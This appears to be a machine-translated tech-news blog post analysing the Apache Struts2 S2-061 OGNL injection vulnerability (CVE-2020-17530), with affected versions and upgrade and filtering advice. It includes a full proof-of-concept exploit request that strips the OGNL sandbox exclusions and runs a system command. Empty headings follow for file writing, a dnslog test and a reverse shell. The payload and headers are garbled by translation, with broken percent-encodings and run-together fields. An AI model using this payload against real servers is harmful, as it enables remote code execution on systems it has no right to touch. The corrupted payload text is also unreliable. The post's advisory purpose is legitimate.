Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about the example analysis of Apache Struts2-61 remote code execution CVE-2020-17530 vulnerability, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

Vulnerability description

Apache Struts2 framework is a Web framework for developing Java EE network applications. Apache Struts disclosed the S2-061 Struts remote code execution vulnerability (CVE-2020-17530) on December 8, 2020. There may be OGNL expression injection vulnerabilities in situations such as the use of some tag, resulting in remote code execution with great risk. This vulnerability is a bypass after fixing the S2-059 vulnerability. The fix for S2-059 only fixed the sandboxie bypass, but not the execution of the OGNL expression. However, the execution of OGNL expressions has also been fixed in the latest version 2.5.26.

This vulnerability is only a bypass fixed by S2-059, and the core class org.apache.commons.collections.BeanMap exploited this time is in the commons-collections-x.x.jar package, but this package is not included in the official minimum dependency package. So even if you sweep to the injection point that supports OGNL expressions, you won't be able to take advantage of it without using this dependency package.

PocGET /? id=%25 {(% 27Powered_by_Unicode_Potats0%2cenjoy_it%27). (% 23UnicodeSec+%3d+%23application [% 27org.apache.tomcat.InstanceManager%27]). (% 23potats0%3d%23UnicodeSec.newInstance (% 27org.apache.commons.collections.BeanMap%27)). (% 23stackvalue%3d%23attr [% 27struts.valueStack%27]). (% 23potats0.setBean (% 23stackvalue)). (% 23context%3d%23potats0.get (% 27context%27)). ( % 23potats0.setBean (% 23context)). (% 23sm%3d%23potats0.get (% 27memberAccess%27)). (% 23emptySet%3d%23UnicodeSec.newInstance (% 27java.util.HashSet%27)). (% 23potats0.setBean (% 23sm)). (% 23potats0.put (% 27excludedClasses%27%2c%23emptySet)). (% 23potats0.put (% 27excludedPackageNames%27%2c%23emptySet)). (% 23exec%3d%23UnicodeSec.newInstance (% 27freemarker.template.utility.Execute%27)). (% 23cmd% 3D {% 27id%27}). (% 23res%3d%23exec.exec (% 23cmd))} HTTP/1.1Host: ip:8080Accept: text/html Application/xhtml+xml,application/xml QQ 0.9, gzip, deflateConnection: close.

Read id

Write a file

Test dnslog

Rebound shell

Affect the version

Apache Struts 2.0.0-2.5.25

Safety recommendation

(1) upgrade Apache Struts framework to the latest version.

(2) or turn on ONGL expression injection protection and filter% {} expressions

(3) when deploying the environment, it is recommended to use minimized deployment and minimum package deployment to avoid vulnerabilities.

After reading the above, do you have any further understanding of the example analysis of the Apache Struts2-61 remote code execution CVE-2020-17530 vulnerability? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.